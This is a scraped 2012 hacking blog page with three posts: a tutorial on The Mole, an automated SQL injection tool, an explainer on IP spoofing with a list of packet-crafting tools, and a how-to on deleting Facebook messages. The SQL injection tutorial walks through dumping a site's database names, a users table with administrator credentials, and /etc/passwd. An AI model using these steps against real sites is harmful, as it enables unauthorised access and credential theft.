border: 1px solid #d2d2d2; padding: 0px 8px 0px 8px; color: #a19999; font-size: 12px; height: 25px; width: 165px; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; margin:0px; } .submitbutton{ background:#F66303; border: 1px solid #F66303; text-shadow: 1px 1px 1px #333; box-shadow: 3px 3px 3px #666; font:bold 12px Arial, sans-serif; color: #fff; height: 25px; padding: 0 12px 0 12px; margin: 0 0 0 5px; border-radius: 5px; -moz-border-radius: 5px; -webkit-border-radius: 5px; cursor:pointer;}

Receive all updates via Facebook. Just Click the Like Button Below

You can also receive Free Email Updates:

Powered By Blogger Widgets

Related Posts Plugin for WordPress, Blogger...

Friday, April 6, 2012

The Mole automatic SQL Injection exploitation tool

The Mole is an automatic SQL Injection exploitation tool. Only by providing a vulnerable URL and a valid string on the site it can detect the injection and exploit it, either by using the union technique or a boolean query based technique.


Support for injections using Mysql, SQL Server, Postgres and Oracle databases.
Command line interface. Different commands trigger different actions.
Auto-completion for commands, command arguments and database, table and columns names.
Support for filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
Exploits SQL Injections through GET/POST/Cookie parameters.
Developed in python 3.
Exploits SQL Injections that return binary data.
Powerful command interpreter to simplify its usage.

Disclaimer: Usage of The Mole for attacking web servers without mutual consent can be considered as an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program.


In this tutorial, you will learn how to use The Mole to exploit SQL Injections, extracting data from the database and reading files from the vulnerable server.
In order to read a complete reference of The Mole's commands and how to use them, please visit (btw, thanks to S├ębastien Damaye for writing such a complete guide!).

If you happen to encounter some problem when exploiting an SQL Injection, caused by some filter or IPS used by the target server, please visit our filters tutorial.

Before we start, you must know what is required in order to exploit a SQL Injection using The Mole. Once you have found a vulnerable script, you have to find a string which normally appears in the web page, but does not appear when you negate the query which is being executed on the database(by modifying the vulnerable parameter).

Identifying the injection

This example will be shown using this test site:

Okay, assuming we don't know there's a SQL Injection, we will ensure there is one on the parameter "id". We negate the query which will be executed in the database, and try to find the string above mentioned.

Fine, we see the string "admin" has disappeared. We will provide this string to The Mole and exploit the injection.

Exploiting the injection

First of all, we execute The Mole using the parameter "-u" to indicate which URL we will be using, and "-n" to indicate the needle/string. Our command should look like this:

./ -u '' -n 'admin'

The mole will start and give us a prompt:

Notice that by default, the last parameter on the URL is used as the vulnerable parameter. If you want to specify another parameter as the vulnerable one, you can use the "-p" command line argument, or use the "injectable_field" command.

Windows users

Windows users shoud be aware that when using the "-u" command line argument, the "&" characters have to be escaped manually using the "^" character. Therefore, if the URL has two parameters, it should look like this:
mole.exe -u^&id=1 -n 'admin'

You can also set the URL by using the "url" command, so you can paste the URL without quoting it. The needle can also be set using the "needle" command.
Okay, we are ready to go. First of all, we want to know which databases are available on the system. The command "schemas" will dump their names.

The Mole has done two things here:

Find exploitation parameters, such as number of columns, the comment to be used, the back-end database, the number of parenthesis, etc.
Once it has been initialized, it dumps the database names, using back-end database specific queries.
Note that the initialization phase is done only once. Moving on, we will dump the tables in the "test" database. The "tables" command does that, and requires the database name as its argument:

Great ! There's a "users" table! Now we need to find the columns of that table. The "columns" command requires the name of the database and table name as its arguments.

We see 3 columns, id, username and password. Now it's time to dump those hashes :D. The "query" command requires the database name, the table name, and a list of comma-separated columns to dump. Alternatively, you could use '*' in the columns field, but we don't want to dump the "id" column right now, so we will do it manually. Remember that The Mole provides nice autocompletion features, so the database, table and column names will be autocompleted whenever you press the TAB key.

Nice! We've got the administrator's credentials. However, when we dumped the database names, we could see "mysql", so we probably have mysql root privileges. Let's find out by using the "dbinfo" command, which will dump the database user, name and version.

Ha, thought so, we have root privileges. Okay, lets try reading a file by using the "readfile" command, which expects the filename to be read as its argument. We will read /etc/passwd as an example.

Okay, now we move on to the handy commands which will make things faster. Imagine we don't know which tables exist on the "mysql" table. In this case, the injection goes quite fast, since it can be exploited through the union technique, however, Blind SQL Injections are pretty common. In the latter case, dumping the name of every table in a certain database can be quite slow. In this case, we will use the "find_users_table" command, which tries to find a table name in a certain database which "looks like" it might contain usernames and passwords(based on its name). Note that this command does not use any metadata database/table, such as information_schema.tables, so it can be used in scenarios where the back-end database is a Mysql < 5, which does not contain the information_schema databse.
This command contains a small list of names, you can artenatively use "find_tables" which tries to find tables using a list provided by you.

As expected, mysql.user exists :D. Now we will use another command which will be more useful, but requires information_schema(or any other DBMS database which serves the same purpose) to exist. The "find_tables_like" command requires a database as its first argument and a string which will be used to search for database names. You can use the '%' wildcard, or any other database specific. As an example, we will find all tables that contain the substring "ABLE".

Going back to the "query" command, we can use some extra parameters which will be useful under certain situations. We can limit the number of rows to be dumped and/or indicate the first index from which to start the dump(0-index based). This prints only one row, starting from the second index. 
We can also indicate a "where condition", in order to only dump rows which match it.

To sum up, here's a video of The Mole exploiting a SQL Injection, using both union and blind techniques.

That is all right now. This tutorial will be extended soon. Hope you find it useful!


IP Spoofing Introduction and Download Tools

What Is IP Spoofing and How Does It Work?

An IP (Internet Protocol) address is the address that reveals the identity of your Internet service provider and your personal Internet connection. The address can be viewed during Internet browsing and in all of your correspondences that you send.

IP spoofing hides your IP address by creating IP packets that contain bogus IP addresses in an effort to impersonate other connections and hide your identity when you send information. IP spoofing is a common method that is used by spammers and scammers to mislead others on the origin of the information they send.

How IP Spoofing Works?

The Internet Protocol or IP is used for sending and receiving data over the Internet and computers that are connected to a network. Each packet of information that is sent is identified by the IP address which reveals the source of the information.

When IP spoofing is used the information that is revealed on the source of the data is not the real source of the information. Instead the source contains a bogus IP address that makes the information packet look like it was sent by the person with that IP address. If you try to respond to the information, it will be sent to a bogus IP address unless the hacker decides to redirect the information to a real IP address.

Why IP Spoofing is Used?

IP spoofing is used to commit criminal activity online and to breach network security. Hackers use IP spoofing so they do not get caught spamming and to perpetrate denial of service attacks. These are attacks that involve massive amounts of information being sent to computers over a network in an effort to crash the entire network. The hacker does not get caught because the origin of the messages cannot be determined due to the bogus IP address.

IP spoofing is also used by hackers to breach network security measures by using a bogus IP address that mirrors one of the addresses on the network. This eliminates the need for the hacker to provide a user name and password to log onto the network.

IP Spoofing Protection

It is possible to protect a network against IP spoofing by using Ingress filtering which uses packets to filter the inbound traffic. The system has the capability to determine if the packets are coming from within the system or from an outside source.

Transmission Control Protocols can also be deployed through a number sequence that is used to create a secure connection to other systems. This method can be enhanced by disconnecting the source routing on the network to prevent hackers from exploiting some of the spoofing capabilities.

DOWNLOAD pdf Introduction to IP Spoofing

IP spoofing tools

Tools - For Windows

Engage Packet Builder v2.20 - Scriptable packet builder for Windows
HPing v2.0.0 - Command-line oriented TCP/IP packet assembler/analyzer
Nemesis v1.4 beta3 - Command-line portable IP stack
Colasoft Packet Builder v1.0 - Tool for creating custom network packets
Colasoft Packet Player v1.1 - Packet replay tool
PacketExcalibur v1.0.2 - Graphical and scriptable network packet engine
Scapy v2.0.0.10 - Interactive packet manipulation tool
Spoofer v0.5 - IP Spoofing Tester
NMap v4.68 - Utility for network exploration and security auditing

Tools - For Linux

LSRscan v1.0 - Loose Source Route Scanning Tool
Scapy v2.0.0.10 - Interactive packet manipulation tool
Sendip v2.5-1 - Send completely arbitrary packets out over the network
Spoofer v0.5 - IP Spoofing Tester
Yersina v0.7.1 - Tool to exploit weakenesses in different network protocols
HPing v2.0.0 - Command-line TCP/IP packet assembler/analyzer
IRPAS v0.8 - Internetwork Routing Portocol Attack Suite (File2Cable etc.)
LSRtunnel v0.2.1 - Loose Source Route Tunneling Tool
Nemesis v1.4 beta3 - Command-line portable IP stack
NMap v4.76 - Utility for network exploration and security auditing
PacketExcalibur v1.0.2 - Graphical and scriptable network packet engine



Thursday, April 5, 2012

How to permanently delete message on Facebook

There is one bad thing in Facebook. It do not want to delete anything from the server. So it has made the deletion work hard. You can not delete your Facebook profile. It also do not allow users to delete messages directly. So it has made an option of archiving messages. So most of the users send Facebook messages to archive in place of deletion. When you open any message on Facebook, you will only see 2 options in front of it. These are "Mark as Unread" and "Archive." So most of the users think that Archive is the way to delete the message. But all the messages which are archived can easily be accessed.
If you also want to access all the messages you have saved in the archive. Follow these steps and see:

Login to your Facebook account.
Go to messages.
Scroll down  the message page and see the links under the label "View". Here you will find a link "Archived".
Click on this link and see the new list of messages.

These are the messages which you have sent in the archive.

There is one more important thing about Facebook messages. Facebook links all your messages into a single conversation. If you have sent a conversation to archive. It will no longer appear in inbox. But it will re-appear and will be back into inbox when you again have a new conversation with the same person. 

So you should delete message permanently if you really want to delete message. Sending it to archive can create privacy trouble in future.

Follow these steps to delete the message permanently.

Login to your facebook account.
Now go to messages and see the list of messages.
Here open the message which you want to delete.
Now click on the action button just above the conversation near the conversation search.
Select "Delete Messages" in the drop down menu.
Now this deleted message is no more in your inbox and cannot be recovered.


Twitter Delicious Facebook Digg Stumbleupon Favorites More